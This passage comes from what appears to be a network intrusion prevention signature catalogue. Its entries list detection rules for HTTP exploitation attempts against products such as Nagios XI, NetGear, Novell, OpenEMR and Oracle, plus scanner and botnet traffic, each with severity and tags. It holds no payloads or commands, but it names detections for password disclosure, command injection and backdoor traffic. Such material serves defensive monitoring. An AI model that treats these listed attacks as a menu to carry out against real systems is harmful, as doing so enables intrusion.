Last changed: sgpkg-ips-509-5211
Vulnerability: Nagios-XI-Alert-Cloud-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Nagios-XI-favorites.inc.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Nagios XI, CVE2024, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Nagios-XI-favorites.inc.php-SQL-Injection
Description:
Back to top

HTTP_CSU-Nagios-XI-Magpie-Curl-Argument-Injection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1118-5242
Vulnerability: Nagios-XI-Magpie-Curl-Argument-Injection
Description:
Back to top

HTTP_CSU-Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712
Description:
Back to top

HTTP_CSU-Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-NaviCOPA-Web-Server-Buffer-Overflow

About this situation: NaviCOPA Web Server 2.01 Buffer Overflow
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, NaviCOPA, CVE2006, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: NaviCOPA-Web-Server-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Navigate-CMS-Unauthenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Navigate CMS detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Navigate CMS, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: Navigate-CMS-Unauthenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Nessus-Vulnerability-Scanner-Usage

About this situation: Detects HTTP traffic generated by the Nessus vulnerability scanner
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Nessus, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

HTTP_CSU-NetBiter-webSCADA-Local-File-Disclosure

About this situation: An attempt to exploit a vulnerability in Netbiter webSCADA detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NetBiter webSCADA, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: NetBiter-webSCADA-Multiple-Vulnerabilities
Description:
Back to top

HTTP_CSU-NetBiter-webSCADA-User-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Netbiter webSCADA detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NetBiter webSCADA, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: NetBiter-webSCADA-Multiple-Vulnerabilities
Description:
Back to top

HTTP_CSU-Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in NetGain Systems Enterprise Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NetGain Systems Enterprise Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1029-5242
Vulnerability: Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal
Description:
Back to top

HTTP_CSU-Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in NetGain Systems Enterprise Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NetGain Systems Enterprise Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1639-5242
Vulnerability: Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal
Description:
Back to top

HTTP_CSU-NetGear-Administrator-Password-Disclosure

About this situation: An attempt to exploit a vulnerability in NetGear detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1127-5242
Vulnerability: NetGear-Administrator-Password-Disclosure
Description:
Back to top

HTTP_CSU-NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass
Description:
Back to top

HTTP_CSU-NetGear-R7000-And-R6400-Command-Injection-Enable-Telnet

About this situation: An attempt to exploit NetGear R7000 and R6400 Command Injection vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, NetGear, CVE2016, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: NetGear-R7000-And-R6400-Cgi-Bin-Command-Injection
Description:
Back to top

HTTP_CSU-NetGear-ReadyNAS-Perl-Code-Injection

About this situation: An attempt to exploit a NetGear ReadyNAS Perl Code Injection vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NETGEAR ReadyNAS, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-761-5211
Vulnerability: NetGear-ReadyNAS-Perl-Code-Injection
Description:
Back to top

HTTP_CSU-NetGear-SSL312-Cgi-DoS

About this situation: Denial of Service in NetGear SSL312
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, NetGear SSL312, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: NetGear-SSL312-Cgi-Binary-DoS
Description:
Back to top

HTTP_CSU-NetGear-WNAP210-And-WNDAP350-Remote-Password-Disclosure

About this situation: An attempt to exploit a vulnerability in NetGear access point detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, NetGear WNAP210, NetGear WNDAP350, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: NetGear-WNAP210-Remote-Password-Disclosure
NetGear-WNDAP350-Remote-Password-Disclosure
Description:
Back to top

HTTP_CSU-NetGear-WNDAP350-Remote-Password-Disclosure

About this situation: An attempt to exploit a vulnerability in NetGear WNDAP350 detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, NetGear WNDAP350, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: NetGear-WNDAP350-Remote-Password-Disclosure
Description:
Back to top

HTTP_CSU-NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NetMechanica NetDecision HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, NetMechanica NetDecision, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-656-5211
Vulnerability: NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_CSU-NetObserve-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in NetObserve detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NetObserve, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: NetObserve-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Netscape-Es-Wp-Access

About this situation: Access of web publishing scripts in Netscape Enterprise Server
Context: HTTP Request URI
Severity: 2
Tags: Windows, Unix, Any Hardware, Netscape Enterprise Server, CVE2000, Windows not specific, Unix not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: Netscape-Es-Dir-Disclosure
Description:
Back to top

HTTP_CSU-Netwin-SurgeMail-Webmail-Format-String

About this situation: Attempt to exploit a format string vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Netwin SurgeMail, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Netwin-SurgeMail-Webmail-Format-String
Description:
Back to top

HTTP_CSU-Nginx-Request-URI-Verification-Security-Bypass

About this situation: An attempt to exploit a vulnerability in nginx HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, nginx, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-1395-5242
Vulnerability: Nginx-Request-URI-Verification-Security-Bypass
Description:
Back to top

HTTP_CSU-Nginx-URI-Parsing-Buffer-Underflow

About this situation: An attempt to exploit a vulnerability in nginx HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, nginx, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Nginx-URI-Parsing-Buffer-Underflow
Description:
Back to top

HTTP_CSU-Nikto-Ipconfig.exe-Scan-Detect

About this situation: Nikto Vulnerability Scanner
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-563-5211
Vulnerability: Nikto-Web-Vulnerability-Scanner
Description:
Back to top

HTTP_CSU-Nikto-Scan-Detect

About this situation: Nikto Vulnerability Scanner
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-563-5211
Vulnerability: Nikto-Web-Vulnerability-Scanner
Description:
Back to top

HTTP_CSU-NMAP-Web-Scanning-Activity

About this situation: Nmap network scanner's activities detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Nmap, Any Operating System not specific, Suspected Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1825-5242
Vulnerability: NMAP-Web-Scanning-Activity
Description:
Back to top

HTTP_CSU-Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315

About this situation: An attempt to exploit a vulnerability in Node.js systeminformation library detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Node.js, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315
Description:
Back to top

HTTP_CSU-NorthStar-C2-XSS-To-Agent-RCE

About this situation: An attempt to exploit a vulnerability in NorthStar C2 detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, NorthStar, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: NorthStar-C2-XSS-To-Agent-RCE
Description:
Back to top

HTTP_CSU-Nostromo-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Nostromo detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Nostromo, CVE2019, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1361-5242
Vulnerability: Nostromo-Directory-Traversal
Description:
Back to top

HTTP_CSU-Novell-eDirectory-dhost-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in the handling of HTTP requests loading eDirectory modules in Novell eDirectory detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Novell-eDirectory-dhost-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Novell-eDirectory-Server-iMonitor-Buffer-Overflow

About this situation: Buffer overflow exploit attempt against Novell eDirectory Server iMonitor
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Novell eDirectory, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-514-5211
Vulnerability: Novell-eDirectory-Server-iMonitor-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Internet Agent detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval
Description:
Back to top

HTTP_CSU-Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell GroupWise detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal

About this situation: Detected attempt to exploit a vulnerability in Novell ZENworks
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1621-5242
Vulnerability: Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal
Description:
Back to top

HTTP_CSU-Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure
Description:
Back to top

HTTP_CSU-Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Novell ZENworks detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Patch Management, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities
Description:
Back to top

HTTP_CSU-NPDS-Thold-SQL-Injection

About this situation: SQL injection attempt against NPDS
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, NPDS, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-720-5211
Vulnerability: HTTP-NPDS-Thold-SQL-Injection
Description:
Back to top

HTTP_CSU-Ntopng-Authentication-Bypass-CVE-2021-28073

About this situation: An attempt to exploit a vulnerability in ntopng detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ntopng, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Vulnerability: Ntopng-Authentication-Bypass-CVE-2021-28073
Description:
Back to top

HTTP_CSU-Nucrypt-Activity

About this situation: Possible Nucrypt activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Nucrypt
Description:
Back to top

HTTP_CSU-NuggetPhantom-Infection-Traffic

About this situation: NuggetPhantom infection traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Vulnerability: NuggetPhantom-Infection-Traffic
Description:
Back to top

HTTP_CSU-Oldrea-Havex-CnC-Request

About this situation: An Oldrea/Havex Backdoor CnC request detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1398-5242
Description:
Back to top

HTTP_CSU-Oneworldstore-Owofflinecc-Information-Disclosure

About this situation: Oneworldstore buyer information disclosure vulnerability
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, OneWorldStore, CVE2005, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Oneworldstore-Owofflinecc-Information-Disclosure
Description:
Back to top

HTTP_CSU-Onlinegames

About this situation: Possible OnlineGames traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, OnlineGames, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSU-OP5-Monitor-Command-Test-Command-Injection

About this situation: An attempt to exploit a op5 Monitor
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, OP5, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Vulnerability: OP5-Monitor-Command-Test-Command-Injection
Description:
Back to top

HTTP_CSU-Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Openemr-C_document.class.php-Patient_Id-Cross-Site-Scripting
Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Openemr-Facility_admin.php-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in OpenEMR detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Vulnerability: Openemr-Facility_admin.php-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Openemr-Make_Task-SQL_Injection

About this situation: An attempt to exploit a vulnerability in OpenEMR Development Team OpenEMR detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, OpenEMR Development Team OpenEMR, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Openemr-Make_Task-SQL_Injection
Description:
Back to top

HTTP_CSU-OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315

About this situation: An attempt to exploit a vulnerability in Ignite Realtime OpenFire detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ignite Realtime Openfire, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315
Description:
Back to top

HTTP_CSU-Openmetadata-Spel-Injection-CVE-2024-28254

About this situation: An attempt to exploit a vulnerability in OpenMetadata detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, OpenMetadata, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Openmetadata-Spel-Injection-CVE-2024-28254
Description:
Back to top

HTTP_CSU-Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor

About this situation: An attempt to exploit a vulnerability in Optergy Proton and Enterprise BMS applications detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Optergy Proton and Enterprise BMS, CVE2019, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor
Description:
Back to top

HTTP_CSU-Oracle-Application-Server-9i-WebCache-File-Corruption

About this situation: An attempt to exploit a vulnerability in Oracle Application Server 9i Web Cache detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server 9i, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1784-5242
Vulnerability: Oracle-Application-Server-9i-WebCache-File-Corruption
Description:
Back to top

HTTP_CSU-Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution

About this situation: An attempt to exploit a vulnerability in Oracle Application Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2005, Any Operating System not specific, Oracle Application Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-649-5211
Vulnerability: Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution
Description:
Back to top

HTTP_CSU-Oracle-Application-Server-Portal-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Oracle Application Server Portal detected
Context: HTTP Request URI
Severity: 7
